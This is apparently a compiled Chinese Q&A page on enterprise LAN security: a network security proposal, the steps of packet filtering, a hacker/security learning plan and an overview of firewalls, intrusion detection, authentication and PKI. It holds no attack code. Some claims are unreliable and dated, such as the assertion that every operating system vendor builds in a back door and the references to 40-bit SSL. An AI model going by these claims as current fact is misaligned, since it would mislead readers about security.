不能进行包过滤的设备是
① 企业局域网前言怎么写
某大型企业局域网安全解决方案
前言:
这是我为某大型企业写一份局域网安全解决方案建议书。本来这是不应该公开的,但是由于种种原因未能被采纳,所以也没什么大碍,现在拿出来给大家当作是一份参考资料,写的不好多多指教。文章是让大家参考的,不是让大家翻录的
第一章 总则
本方案为某大型局域网网络安全解决方案,包括原有网络系统分析、安全需求分析、安全目标的确立、安全体系结构的设计、等。本安全解决方案的目标是在不影响某大型企业局域网当前业务的前提下,实现对他们局域网全面的安全管理。
发送电子邮件等;
2.3 网络结构的特点
在分析这个企业局域网的安全风险时,应考虑到网络的如下几个特点:
1.网络与Internet直接连结,因此在进行安全方案设计时要考虑与Internet连结的有关风险,包括可能通过Internet传播进来病毒,黑客攻击,来自Internet的非授权访问等。
。
2.网络中存在公开服务器,由于公开服务器对外必须开放部分业务,因此在进行安全方案设计时应该考虑采用安全服务器网络,避免公开服务器的安全风险扩散到内部。
3.内部网络中存在许多不同的子网,不同的子网有不同的安全性,因此在进行安全方案设计时,应考虑将不同功能和安全级别的网络分割开,这可以通过交换机划分VLAN来实现。
4.网络中有二台应用服务器,在应用程序开发时就应考虑加强用户登录验证,防止非授权的访问。
总而言之,在进行网络方案设计时,应综合考虑到这个企业局域网的特点,根据产品的性能、价格、潜在的安全风险进行综合考虑。
第三章 网络系统安全风险分析
随着Internet网络急剧扩大和上网用户迅速增加,风险变得更加严重和复杂。原来由单个计算机安全事故引起的损害可能传播到其他系统,引起大范围的瘫痪和损失;另外加上缺乏安全控制机制和对Internet安全政策的认识不足,这些风险正日益严重。
针对这个企业局域网中存在的安全隐患,在进行安全方案设计时,下述安全风险我们必须要认真考虑,并且要针对面临的风险,采取相应的安全措施。下述风险由多种因素引起,与这个企业局域网结构和系统的应用、局域网内网络服务器的可靠性等因素密切相关。下面列出部分这类风险因素:
网络安全可以从以下三个方面来理解:1 网络物理是否安全;2 网络平台是否安全;3 系统是否安全;4 应用是否安全;5 管理是否安全。针对每一类安全风险,结合这个企业局域网的实际情况,我们将具体的分析网络的安全风险。
3.1物理安全风险分析
网络的物理安全的风险是多种多样的。
网络的物理安全主要是指地震、水灾、火灾等环境事故;电源故障;人为操作失误或错误;设备被盗、被毁;电磁干扰;线路截获。以及高可用性的硬件、双机多冗余的设计、机房环境及报警系统、安全意识等。它是整个网络系统安全的前提,在这个企业区局域网内,由于网络的物理跨度不大,,只要制定健全的安全管理制度,做好备份,并且加强网络设备和机房的管理,这些风险是可以避免的。
3.2网络平台的安全风险分析
网络结构的安全涉及到网络拓扑结构、网络路由状况及网络的环境等。
公开服务器面临的威胁
这个企业局域网内公开服务器区(WWW、EMAIL等服务器)作为公司的信息发布平台,一旦不能运行后者受到攻击,对企业的声誉影响巨大。同时公开服务器本身要为外界服务,必须开放相应的服务;每天,黑客都在试图闯入Internet节点,这些节点如果不保持警惕,可能连黑客怎么闯入的都不知道,甚至会成为黑客入侵其他站点的跳板。因此,规模比较大网络的管理人员对Internet安全事故做出有效反应变得十分重要。我们有必要将公开服务器、内部网络与外部网络进行隔离,避免网络结构信息外泄;同时还要对外网的服务请求加以过滤,只允许正常通信的数据包到达相应主机,其他的请求服务在到达主机之前就应该遭到拒绝。
整个网络结构和路由状况
安全的应用往往是建立在网络系统之上的。网络系统的成熟与否直接影响安全系统成功的建设。在这个企业局域网络系统中,只使用了一台路由器,用作与Internet连结的边界路由器,网络结构相对简单,具体配置时可以考虑使用静态路由,这就大大减少了因网络结构和网络路由造成的安全风险。
3.3系统的安全风险分析
所谓系统的安全显而易见是指整个局域网网络操作系统、网络硬件平台是否可靠且值得信任。
网络操作系统、网络硬件平台的可靠性:对于中国来说,恐怕没有绝对安全的操作系统可以选择,无论是Microsoft的Windows NT或者其他任何商用UNIX操作系统,其开发厂商必然有其Back-Door。我们可以这样讲:没有完全安全的操作系统。但是,我们可以对现有的操作平台进行安全配置、对操作和访问权限进行严格控制,提高系统的安全性。因此,不但要选用尽可能可靠的操作系统和硬件平台。而且,必须加强登录过程的认证(特别是在到达服务器主机之前的认证),确保用户的合法性;其次应该严格限制登录者的操作权限,将其完成的操作限制在最小的范围内。
3.4应用的安全风险分析
应用系统的安全跟具体的应用有关,它涉及很多方面。应用系统的安全是动态的、不断变化的。应用的安全性也涉及到信息的安全性,它包括很多方面。
应用系统的安全动态的、不断变化的:应用的安全涉及面很广,以目前Internet上应用最为广泛的E-mail系统来说,其解决方案有几十种,但其系统内部的编码甚至编译器导致的BUG是很少有人能够发现的,因此一套详尽的测试软件是相当必须的。但是应用系统是不断发展且应用类型是不断增加的,其结果是安全漏洞也是不断增加且隐藏越来越深。因此,保证应用系统的安全也是一个随网络发展不断完善的过程。
应用的安全性涉及到信息、数据的安全性:信息的安全性涉及到:机密信息泄露、未经授权的访问、破坏信息完整性、假冒、破坏系统的可用性等。由于这个企业局域网跨度不大,绝大部分重要信息都在内部传递,因此信息的机密性和完整性是可以保证的。对于有些特别重要的信息需要对内部进行保密的(比如领导子网、财务系统传递的重要信息)可以考虑在应用级进行加密,针对具体的应用直接在应用系统开发时进行加密。
3.5管理的安全风险分析
管理是网络安全中最重要的部分
管理是网络中安全最最重要的部分。责权不明,管理混乱、安全管理制度不健全及缺乏可操作性等都可能引起管理安全的风险。责权不明,管理混乱,使得一些员工或管理员随便让一些非本地员工甚至外来人员进入机房重地,或者员工有意无意泄漏他们所知道的一些重要信息,而管理上却没有相应制度来约束。
当网络出现攻击行为或网络受到其它一些安全威胁时(如内部人员的违规操作等),无法进行实时的检测、监控、报告与预警。同时,当事故发生后,也无法提供黑客攻击行为的追踪线索及破案依据,即缺乏对网络的可控性与可审查性。这就要求我们必须对站点的访问活动进行多层次的记录,及时发现非法入侵行为。
建立全新网络安全机制,必须深刻理解网络并能提供直接的解决方案,因此,最可行的做法是管理制度和管理解决方案的结合。
3.6黑客攻击
黑客们的攻击行动是无时无刻不在进行的,而且会利用系统和管理上的一切可能利用的漏洞。公开服务器存在漏洞的一个典型例证,是黑客可以轻易地骗过公开服务器软件,得到Unix的口令文件并将之送回。黑客侵入UNIX服务器后,有可能修改特权,从普通用户变为高级用户,一旦成功,黑客可以直接进入口令文件。黑客还能开发欺骗程序,将其装入UNIX服务器中,用以监听登录会话。当它发现有用户登录时,便开始存储一个文件,这样黑客就拥有了他人的帐户和口令。这时为了防止黑客,需要设置公开服务器,使得它不离开自己的空间而进入另外的目录。另外,还应设置组特权,不允许任何使用公开服务器的人访问WWW页面文件以外的东西。在这个企业的局域网内我们可以综合采用防火墙技术、Web页面保护技术、入侵检测技术、安全评估技术来保护网络内的信息资源,防止黑客攻击。
3.7通用网关接口(CGI)漏洞
有一类风险涉及通用网关接口(CGI)脚本。许多页面文件和指向其他页面或站点的超连接。然而有些站点用到这些超连接所指站点寻找特定信息。搜索引擎是通过CGI脚本执行的方式实现的。黑客可以修改这些CGI脚本以执行他们的非法任务。通常,这些CGI脚本只能在这些所指WWW服务器中寻找,但如果进行一些修改,他们就可以在WWW服务器之外进行寻找。要防止这类问题发生,应将这些CGI脚本设置为较低级用户特权。提高系统的抗破坏能力,提高服务器备份与恢复能力,提高站点内容的防篡改与自动修复能力。
3.8恶意代码
恶意代码不限于病毒,还包括蠕虫、特洛伊木马、逻辑炸弹、和其他未经同意的软件。应该加强对恶意代码的检测。
3.9病毒的攻击
计算机病毒一直是计算机安全的主要威胁。能在Internet上传播的新型病毒,例如通过E-Mail传播的病毒,增加了这种威胁的程度。病毒的种类和传染方式也在增加,国际空间的病毒总数已达上万甚至更多。当然,查看文档、浏览图像或在Web上填表都不用担心病毒感染,然而,下载可执行文件和接收来历不明的E-Mail文件需要特别警惕,否则很容易使系统导致严重的破坏。典型的“CIH”病毒就是一可怕的例子。
3.10不满的内部员工
不满的内部员工可能在WWW站点上开些小玩笑,甚至破坏。不论如何,他们最熟悉服务器、小程序、脚本和系统的弱点。对于已经离职的不满员工,可以通过定期改变口令和删除系统记录以减少这类风险。但还有心怀不满的在职员工,这些员工比已经离开的员工能造成更大的损失,例如他们可以传出至关重要的信息、泄露安全重要信息、错误地进入数据库、删除数据等等。
3.11网络的攻击手段
一般认为,目前对网络的攻击手段主要表现在:
非授权访问:没有预先经过同意,就使用网络或计算机资源被看作非授权访问,如有意避开系统访问控制机制,对网络设备及资源进行非正常使用,或擅自扩大权限,越权访问信息。它主要有以下几种形式:假冒、身份攻击、非法用户进入网络系统进行违法操作、合法用户以未授权方式进行操作等。
信息泄漏或丢失:指敏感数据在有意或无意中被泄漏出去或丢失,它通常包括,信息在传输中丢失或泄漏(如"黑客"们利用电磁泄漏或搭线窃听等方式可截获机密信息,或通过对信息流向、流量、通信频度和长度等参数的分析,推出有用信息,如用户口令、帐号等重要信息。),信息在存储介质中丢失或泄漏,通过建立隐蔽隧道等窃取敏感信息等。
破坏数据完整性:以非法手段窃得对数据的使用权,删除、修改、插入或重发某些重要信息,以取得有益于攻击者的响应;恶意添加,修改数据,以干扰用户的正常使用。
拒绝服务攻击:它不断对网络服务系统进行干扰,改变其正常的作业流程,执行无关程序使系统响应减慢甚至瘫痪,影响正常用户的使用,甚至使合法用户被排斥而不能进入计算机网络系统或不能得到相应的服务。
利用网络传播病毒:通过网络传播计算机病毒,其破坏性大大高于单机系统,而且用户很难防范。
第四章 安全需求与安全目标
4.1安全需求分析
通过前面我们对这个企业局域网络结构、应用及安全威胁分析,可以看出其安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护以及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
公开服务器的安全保护
防止黑客从外部攻击
入侵检测与监控
信息审计与记录
病毒防护
数据安全保护
数据备份与恢复
网络的安全管理
针对这个企业局域网络系统的实际情况,在系统考虑如何解决上述安全问题的设计时应满足如下要求:
1.大幅度地提高系统的安全性(重点是可用性和可控性);
2.保持网络原有的能特点,即对网络的协议和传输具有很好的透明性,能透明接入,无需更改网络设置;
3.易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
4.尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
5.安全保密系统具有较好的性能价格比,一次性投资,可以长期使用;
6.安全产品具有合法性,及经过国家有关管理部门的认可或认证;
7.分布实施。
4.2网络安全策略
安全策略是指在一个特定的环境里,为保证提供一定级别的安全保护所必须遵守的规则。该安全策略模型包括了建立安全环境的三个重要组成部分,即:
威严的法律:安全的基石是社会法律、法规、与手段,这部分用于建立一套安全管理标准和方法。即通过建立与信息安全相关的法律、法规,使非法分子慑于法律,不敢轻举妄动。
先进的技术:先进的安全技术是信息安全的根本保障,用户对自身面临的威胁进行风险评估,决定其需要的安全服务种类,选择相应的安全机制,然后集成先进的安全技术。
严格的管理:各网络使用机构、企业和单位应建立相宜的信息安全管理办法,加强内部管理,建立审计和跟踪体系,提高整体信息安全意识。
4.3系统安全目标
基于以上的分析,我们认为这个局域网网络系统安全应该实现以下目标:
建立一套完整可行的网络安全与网络管理策略
将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络的直接通信
建立网站各主机和服务器的安全保护措施,保证他们的系统安全
对网上服务请求内容进行控制,使非法访问在到达主机前被拒绝
加强合法用户的访问认证,同时将用户的访问权限控制在最低限度
全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为
加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完 整的系统日志
备份与灾难恢复——强化系统备份,实现系统快速恢复
加强网络安全管理,提高系统全体人员的网络安全意识和防范技术
第五章 网络安全方案总体设计
5.1安全方案设计原则
在对这个企业局域网网络系统安全方案设计、规划时,应遵循以下原则:
综合性、整体性原则:应用系统工程的观点、方法,分析网络的安全及具体措施。安全措施主要包括:行政法律手段、各种管理制度(人员审查、工作流程、维护保障制度等)以及专业措施(识别技术、存取控制、密码、低辐射、容错、防病毒、采用高安全产品等)。一个较好的安全措施往往是多种方法适当综合的应用结果。一个计算机网络,包括个人、设备、软件、数据等。这些环节在网络中的地位和影响作用,也只有从系统综合整体的角度去看待、分析,才能取得有效、可行的措施。即计算机网络安全应遵循整体安全性原则,根据规定的安全策略制定出合理的网络安全体系结构。
需求、风险、代价平衡的原则:对任一网络,绝对安全难以达到,也不一定是必要的。对一个网络进行实际额研究(包括任务、性能、结构、可靠性、可维护性等),并对网络面临的威胁及可能承担的风险进行定性与定量相结合的分析,然后制定规范和措施,确定本系统的安全策略。
一致性原则:一致性原则主要是指网络安全问题应与整个网络的工作周期(或生命周期)同时存在,制定的安全体系结构必须与网络的安全需求相一致。安全的网络系统设计(包括初步或详细设计)及实施计划、网络验证、验收、运行等,都要有安全的内容光焕发及措施,实际上,在网络建设的开始就考虑网络安全对策,比在网络建设好后再考虑安全措施,不但容易,且花费也小得多。
易操作性原则:安全措施需要人为去完成,如果措施过于复杂,对人的要求过高,本身就降低了安全性。其次,措施的采用不能影响系统的正常运行。
分步实施原则:由于网络系统及其应用扩展范围广阔,随着网络规模的扩大及应用的增加,网络脆弱性也会不断增加。一劳永逸地解决网络安全问题是不现实的。同时由于实施信息安全措施需相当的费用支出。因此分步实施,即可满足网络系统及信息安全的基本需求,亦可节省费用开支。
多重保护原则:任何安全措施都不是绝对安全的,都可能被攻破。但是建立一个多重保护系统,各层保护相互补充,当一层保护被攻破时,其它层保护仍可保护信息的安全。
可评价性原则:如何预先评价一个安全设计并验证其网络的安全性,这需要通过国家有关网络信息安全测评认证机构的评估来实现。
5.2安全服务、机制与技术
安全服务:安全服务主要有:控制服务、对象认证服务、可靠性服务等;
安全机制:访问控制机制、认证机制等;
安全技术:防火墙技术、鉴别技术、审计监控技术、病毒防治技术等;在安全的开放环境中,用户可以使用各种安全应用。安全应用由一些安全服务来实现;而安全服务又是由各种安全机制或安全技术来实现的。应当指出,同一安全机制有时也可以用于实现不同的安全服务。
第六章 网络安全体系结构
通过对网络的全面了解,按照安全策略的要求、风险分析的结果及整个网络的安全目标,整个网络措施应按系统体系建立。具体的安全控制系统由以下几个方面组成:物理安全、网络安全、系统安全、信息安全、应用安全和安全管理
6.1物理安全
保证计算机信息系统各种设备的物理安全是整个计算机信息系统安全的前提,物理安全是保护计算机网络设备、设施以及其它媒体免遭地震、水灾、火灾等环境事故以及人为操作失误或错误及各种计算机犯罪行为导致的破坏过程。 它主要包括三个方面:
环境安全:对系统所在环境的安全保护,如区域保护和灾难保护;(参见国家标准GB50173-93《电子计算机机房设计规范》、国标GB2887-89《计算站场地技术条件》、GB9361-88《计算站场地安全要求》
设备安全:主要包括设备的防盗、防毁、防电磁信息辐射泄漏、防止线路截获、抗电磁干扰及电源保护等;
媒体安全:包括媒体数据的安全及媒体本身的安全。
在网络的安全方面,主要考虑两个大的层次,一是整个网络结构成熟化,主要是优化网络结构,二是整个网络系统的安全。
6.2.1网络结构
安全系统是建立在网络系统之上的,网络结构的安全是安全系统成功建立的基础。在整个网络结构的安全方面,主要考虑网络结构、系统和路由的优化。
网络结构的建立要考虑环境、设备配置与应用情况、远程联网方式、通信量的估算、网络维护管理、网络应用与业务定位等因素。成熟的网络结构应具有开放性、标准化、可靠性、先进性和实用性,并且应该有结构化的设计,充分利用现有资源,具有运营管理的简便性,完善的安全保障体系。网络结构采用分层的体系结构,利于维护管理,利于更高的安全控制和业务发展。
网络结构的优化,在网络拓扑上主要考虑到冗余链路;防火墙的设置和入侵检测的实时监控等。
6.2.2网络系统安全
6.2.2.1 访问控制及内外网的隔离
访问控制
访问控制可以通过如下几个方面来实现:
1.制订严格的管理制度:可制定的相应:《用户授权实施细则》、《口令字及帐户管理规范》、《权限管理制度》。
2.配备相应的安全设备:在内部网与外部网之间,设置防火墙实现内外网的隔离与访问控制是保护内部网安全的最主要、同时也是最有效、最经济的措施之一。防火墙设置在不同网络或网络安全域之间信息的唯一出入口。
防火墙主要的种类是包过滤型,包过滤防火墙一般利用IP和TCP包的头信息对进出被保护网络的IP包信息进行过滤,能根据企业的安全政策来控制(允许、拒绝、监测)出入网络的信息流。同时可实现网络地址转换(NAT)、审记与实时告警等功能。由于这种防火墙安装在被保护网络与路由器之间的通道上,因此也对被保护网络和外部网络起到隔离作用。
防火墙具有以下五大基本功能:过滤进、出网络的数据;管理进、出网络的访问行为;封堵某些禁止的业务;记录通过防火墙的信息内容和活动;对网络攻击的检测和告警。
6.2.2.2 内部网不同网络安全域的隔离及访问控制
② 包过滤防火墙的基本过程
下面做个简单的叙述:
(1)包过滤规则必须被包过滤设备端口存储起来内。
(2)当包到达端口时,对包报头容进行语法分析。大多数包过滤设备只检查IP、TCP、或UDP报头中的字段。
(3)包过滤规则以特殊的方式存储。应用于包的规则的顺序与包过滤器规则存储顺序必须相同。
(4)若一条规则阻止包传输或接收,则此包便不被允许。
(5)若一条规则允许包传输或接收,则此包便可以被继续处理。
(6)若包不满足任何一条规则,则此包便被阻塞。
③ 安全设备指什么(包过滤、访问控制)
保卫自我的一些摄制器材!一些保障你隐私的软件和设备。一般是密码,防毒软件密码、安全防护等!@不同的应用,安全设备的定义不用,太广泛了
④ 有关黑客的问题
基础:
如何去学习
·要有学习目标
·要有学习计划
·要有正确的心态
·有很强的自学能力
学习目标
·1.明确自己的发展方向(你现在或者将来要做什么,程序员?安全专家?网络黑客等)
·2.自己目前的水平和能力有多高
·能简单操作windows2000
·能简单配置windows2000的一些服务
·能熟练的配置Windows2000的各种服务
·能熟练配置win2000和各种网络设备联网
·能简单操作Linux,Unix,Hp-unix, Solaris中的一种或者多种操作系统
·能配置cicso,huawei,3com,朗迅等网络设备
·会简单编写C/C++,Delphi,Java,PB,VB,Perl
·能简单编写Asp,Php,Cgi和script,shell脚本
·3.必须学会不相信态度,尊重各种各样的能力
·不要为那些装模做样的人浪费时间
·尊重别人的能力,
·会享受提高自己能力的乐趣.
·在知道了自己的水平和能力之后就要开始自己的目标了
·--------安全专家
·--------黑客
·--------高级程序员
·黑客是建设网络,不是破坏网络, 破坏者是骇客;
·黑客有入侵的技术,但是他们是维护网络的,所以和安全专家是差不多的;
·因为懂得如何入侵才知道如何维护
·因为懂得如何维护才更要了解如何入侵
·这是 黑客与安全专家的联系
·但,他们都是在会编程的基础上成长的!
·下面我们开始我们的学习计划!
学习计划
有了学习计划才能更有效的学习
安全学习计划
不奢求对win98有多么精通,我们也不讲解win98如何应用,如何精通,我们的起步是win2000 s
erver,这是我们培训的最低标准,你对英语有一定的了解也是必不可少
最基础
·a.会装win2000,知道在安装的时候有两种分区格式,NTFS与FAT32 及他们的区别,知道win2
000可以在安装的时候分区,格式化硬盘, 可以定制安装,可以定制自己需要安装的一些组件
,如果有网络适配器,可以直接加入域中 学习点:NTFS和FAT32分区的不同 各个组件的作用
域的定义
·b.知道如何开,关机 知道注销的用处
·c.知道win2000下面各主要目录的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具里面各个组件的定义
·e.学会应用命令提示符cmd(dos)
·f.知道计算机管理里面的各个选项的不通
·g.知道win2000强大的网络管理功能
·h.能非常熟练的操作win2000
·i.知道IP地址,子网掩码,网关和MAC的区别
进阶
·A.配置IIS,知道各个选项的作用
·B.配置DNS,DHCP
·C.配置主控制域,辅助域
·D.配置DFS
·E.配置路由和远程访问
·F.配置安全策略IPSEC
·G.配置service(服务)
·H.配置磁盘管理,磁盘分额
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安装与简单配置
·K.交换机的安装与简单配置
·L.常见的VPN,VLAN,NAT配置
·M.配置常见的企业级防火墙
·N.配置常见的企业级防病毒软件
高级
·之前我们学到的是任何一个想成为网络安全专家和黑客基本知识中的一部分
·你作到了吗??
·如果你做到了,足以找到一份很不错的工作!
配置负载均衡
·配置WIN2000+IIS+EXCHANGE+MSSQL+SERVER-U+负载均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三层交换网络 ·
·配置各种复杂的网络环境
·能策划一个非常完整的网络方案 ·
·能独自组建一个大型的企业级网络 ·
·能迅速解决网络中出现的各种疑难问题
结束
·在你上面的都学好了,你已经是一个高级人才了,也是我们VIP培训的目标!
·可以找到一份非常好的工作
·不会再因为给女朋友买不起玫瑰而发愁了!
安全:
导读
·系统安全服务(SYSTEM)
·防火墙系统(FIREWALL)
·入侵检测(IDS)
·身份验证(CA)
·网站监控和恢复(WEBSITE)
·安全电子商务(E-BUSINESS)
·安全电子邮件(E-MAIL)
·安全办公自动化(OA)
·Internet访问和监控(A&C)
·病毒防范(VIRUS)
·虚拟局域网(VPN)
系统安全服务
·系统安全管理
·系统安全评估
·系统安全加固
·系统安全维护
·安全技能学习
系统安全管理
·信息系统安全策略
·信息系统管理员安全手册
·信息系统用户安全手册
·紧急事件处理流程
系统安全评估
1、系统整体安全分析
· 分析用户的网络拓扑结构,以找出其结构性及网络 配置上存在的安全隐患。
· 通过考察用户信息设备的放置场地,以使得设备物理上是安全的。
· 分析用户信息系统的管理、使用流程,以使得系统 能够安全地管理、安全地使用
2、主机系统安全检测
· 通过对主机进行安全扫描,以发现系统的常见的安全漏洞。
· 对于特定的系统,采用特别的工具进行安全扫描。
· 根据经验,对系统存在的漏洞进行综合分析。
· 给出系统安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的危险。
· 给出修复安全漏洞的建议
3、网络设备安全检测
· 通过对网络进行安全扫描,以发现网络设备的安全漏洞。
· 根据经验,对网络设备存在的漏洞进行综合析。
· 给出网络设备安全漏洞报告。
· 指出各个安全漏洞产生的原因以及会造成的险。
· 给出修复安全漏洞的建议。
安全系统加固
·为用户系统打最新安全补丁程序。
·为用户修复系统、网络中的安全漏洞。
·为用户去掉不必要的服务和应用系统。
·为用户系统设置用户权限访问策略。
·为用户系统设置文件和目录访问策略。
·针对用户系统应用进行相应的安全处理。
安全系统维护
·防火墙系统维护,安全日志分析
·IDS系统维护,安全日志分析
·VPN系统维护,安全日志分析
·认证系统维护,安全日志分析
·服务器、主机系统,安全日志分析
·其它各类安全设施维护及日志分析
安全技能培训
·网络安全基础知识
·网络攻击手段演示和防范措施
·防火墙的原理和使用
·VPN的原理和使用
·漏洞扫描工具的原理和使用
·IDS(入侵检测系统)的原理和使用
·身份认证系统的原理和使用
·防病毒产品的原理和使用
·系统管理员安全培训
·一般用户安全培训
防火墙系统
·防火墙的定义
·防火墙的分类
·包过滤防火墙
·应用网关防火墙
·状态检测防火墙
·一般企业防火墙配置
·政府机构防火墙配置
·涉密网络保密网关配置
·高可用性和负载均衡防火墙系统
·高速防火墙系统
防火墙的定义
·用以连接不同信任级别网络的设备。
·用来根据制定的安全规则对网络间的通信进行控制
防火墙的分类
·包过滤 (Packet Filters)
·应用网关 (Application Gateways)
·状态检测(Stateful Inspection)
包过滤防火墙
·包 过 滤 技 术
·主要在路由器上实现,根据用户定义的内容(如IP地址、端口号)进行过滤。包过滤在网
络层进行包检查与应用无关。
· 优 点
· 具有良好的性能和可伸缩性。
· 缺点
· 由于包过滤技术是对应用不敏感的,无法理解特定通讯的含义,因而安全性很差。
应用网关防火墙
·应用网关技术
·第二代防火墙技术,其在应用的检查方面有了较大的改进,能监测所有应用层,同时对应
用“内容”(Content Information)的含义引入到了防火墙策略的决策处理。
· 优点
· 安全性比较高。
· 缺点
· 1、该方法对每一个请求都必须建立两个连接,一个从客户端到防火墙系统,另一个从
防火墙系统到服务器,这会严重影响性能。
· 2、防火墙网关暴露在攻击者之中。
· 3、对每一个代理需要有一个独立的应用进程或 daemon 来处理, 这样扩展性和支持
新应用方面存在问题。
检测状态防火墙
· 属第三代防火墙技术,克服了以上两种方法的缺点,引入了OSI全七层监测能力,同时
又能保持 Client/Server的体系结构,也即对用户访问是透明的。
· 防火墙能保护、限制其他用户对防火墙网关本身的访问。
· 状态检测技术在网络层截获数据包后交给INSPECT Engine,通过 INSPECT Engine 可以
从数据包中抽取安全决策所需的所有源于应用层中的状态相关信息,并在动态状态表中 维
持这些信息以提供后继连接的可能性预测。该方法能提供高安全性、高性能和扩展性、高伸
缩性的解决方案。
入侵检测系统
·处理攻击时遇到的典型问题
·解决入侵的方法和手段
·基于网络的入侵检测
·基于主机的入侵检测
·入侵检测系统典型配置
处理攻击时遇到的问题
·获得的信息不足
·不知到网络上发生了什么事。
·无法判定系统是否已经被入侵。
·信息不准确
·人员少
·没有足够的人员维护管理。
·缺乏规范的处理程序
·发现攻击时如何反应?
·下一步该如何处理?
解决入侵的方法和手段
·采用入侵实时入侵监控系统(IDS)
·对系统、网络中发生的事件进行实时监控。
·当发生入侵事件时能即时反应。
·对入侵事件进行详细记录并跟踪。
基于主机的入侵检测
·软件模块安装在包含有重要数据的主机上
·监视操作系统的日志以发现攻击的特征。
·监视代理所处主机上的所有进程和用户.
·监视暴力登录攻击(brute-force login), 试图改变或绕过安全设定,及特权的滥用等
。
·当新的日志产生时,为了减小对CPU的影响,代理程序暂时中断。
基于网络的入侵检测
·软件安装在专门的主机上,放置于关键的网段
·将配置该软件主机的网卡设置为混杂模式,使得该主机能接受网段上所有的包。
·分析数据包以判断是否有黑客攻击。
·监视网段上的所有数据。
·对网络的流量无任何影响。
·能检测到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻击。
身份认证系统
·用户身份认证的方法
·不同认证方法的安全级别
·用户身份认证的常用方式
·解决问题的方法
·目前比较成熟的双因素认证方法
用户身份验证
·你知道的一些东西
· 密码, 身份证号,生日
·你有的一些东西
· 磁卡, 智能卡,令牌, 钥匙
·你独有的一些东西
· 指纹,声音,视网膜
密码是不安全的
·可以破解密码的工具太多
·大多密码在网络中是明文传输的
·密码可以网络离线时被窥测
·密码和文件从PC和服务器上被转移了
·好记的密码容易被猜到,不易猜测的密码又太难记
解决方法
·使用混合的工具:如IC卡+PIN
网站监控与恢复系统
·典型的Web服务器应用
·Web服务器存在的安全问题
·网站安全解决方法
典型web服务器应用
·Internet-->路由器-->防火墙-->web站点
· |
· |
· 内部网
·所有的放在防火墙后面
Web服务器存在的安全问题
· 网页被非法篡改是网站内容提供者最头痛的问题。在采用防火墙后,Web服务器本身的漏
洞成为了网站被黑的主要问题。
· Web应用服务器(如IIS,Apache中存在着大量的安 全漏洞.)
· 用户自己开发的CGI、ASP、PHP应用中存在着大量潜在的漏洞。
网站安全
·采用Web服务器监控与恢复系统
·该系统提供对网站文件内容的实时监控,发现被改动后立即报警并自动恢复。
电子商务安全系统
·典型的电子商务应用
·电子商务中存在的安全问题
·电子商务的安全解决方法
·实时数据交换系统
典型电子商务应用
·Internet--->防火墙--->Web服务器
· || |
· || |
· 内部网(数据库)
电子商务中存在的安全问题
·1、Web服务器端
·Web应用服务器(如IIS、Apache中存在着大量的安全漏洞。用户自己开发的CGI、ASP、PH
P应用中存在着潜在的漏洞。
· 黑客通过这些漏洞攻击Web服务器,可非法篡改网页,造成恶劣影响,动摇了电子商务使
用者的信心。
· 甚至可获得Web服务器上大量的敏感资料,如用户的信用卡号,用以连接内部数据库的帐
号和口令。
· 可能通过控制Web服务器,来攻击内部数据库。
电子商务中存在的安全问题
·2、SSL协议
·SSL加密强度低。由于浏览器默认的加密模块只支持40位的低强度加密,而且即使在浏览
器中安装更高位的加密模块,由于WEB服务器不提供对高位SSL链接的支持同样无法实现高强
度SSL加密链接。
· 无法解决电子商务中的用户签名。SSL链接建立WEB服务器和用户浏览器之间的安全通道
只能保证在安全通道内的信息不被窃听或篡改,并不能对用户发送的信息进行签名以保证信
息的有效性和不可抵赖性,而这正是电子商务中必须解决的问题。
电子商务的安全解决方法
·将WEB服务器分为两部分:一般内容的WEB服务器和交易WEB服务器。
· 一般内容的WEB服务器放置在DMZ区内,采用WEB站点监控和恢复系统保护,防止主页被非
法改动。
· 交易WEB服务器放置在内部网内,通过一台物理分隔的实时数据交换系统将其与DMZ区相
连。
· 在客户机和服务器端安装SSL代理,从而获得128位的高强度加密通道
实时数据交换系统
·将系统外部 Web服务器和内部应用Web服务器物理隔开.
·外部Web服务器用于存放一般的信息,内部Web服 务器用于存放敏感信息,并和内部数据
库连接。
·外部用户通过http访问位于DMZ区内的一般Web服务器。
·当进行交易时,用户需访问位于内部网内的应用服务器。
·https连接首先到达实时数据交换系统的虚拟外部Web服务器,实时数据交换系统将https
协议解开,只将https连接的数据内容拷贝到虚拟内部Web服务器,虚拟内部Web服务器将使
用该数据重新发起https连接到实际的内部应用Web服务器.
·内外通过实时数据交换系统进行数据交换,无任何协议和连接穿过实时数据交换系统。
·即使DMZ区的Web服务器受到攻击, 攻击者也的不到任何有用的信息
安全电子邮件系统
·电子邮件的安全问题
·安全电子邮件的解决方法
·一个安全邮件的使用过程
电子邮件的安全问题
·如何保证发送的敏感信息不被泄漏
·如何保证发送的信息不被篡改
·如何确认发件人的真实身份
·如何防止发件人的抵赖行为
安全电子邮件的解决方法
·将PKI体系应用到邮件系统中
·邮件的加密和解密以实现数据的保密。
·邮件的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系。
·支持128bit对称密钥算法和1024bit公开密钥算法。
办公自动化系统的安全问题
· 如何保证发送的敏感信息不被泄漏
· 如何保证发送的信息不被篡改
· 如何确认发件人的真实身份
· 如何防止发件人的抵赖行为
安全办公自动化系统的解决方法
·将PKI体系应用到办公自动化系统中
·工作流信息的加密和解密以实现数据保密
·工作流信息的数字签名(鉴别)实现发件人认证和不可抵赖。
·完整性校验功能防止信息传输过程中被篡改可*的安全性。
·采用公开密钥和对称密钥相结合的密钥体系
·支持128bit对称密钥算法和1024bit公开密钥算法。
Internet访问及控制系统
·Internet使用存在的问题
·Internet使用的解决方法
·内容缓存系统
·Internet站点过滤系统
Internet访问存在的问题
·Internet接入带宽不足,访问比较慢。
·大量的用户访问相同的内容,造成带宽的进一步拥挤。
·在上班时间里大量的Internet访问是与业务无关的。
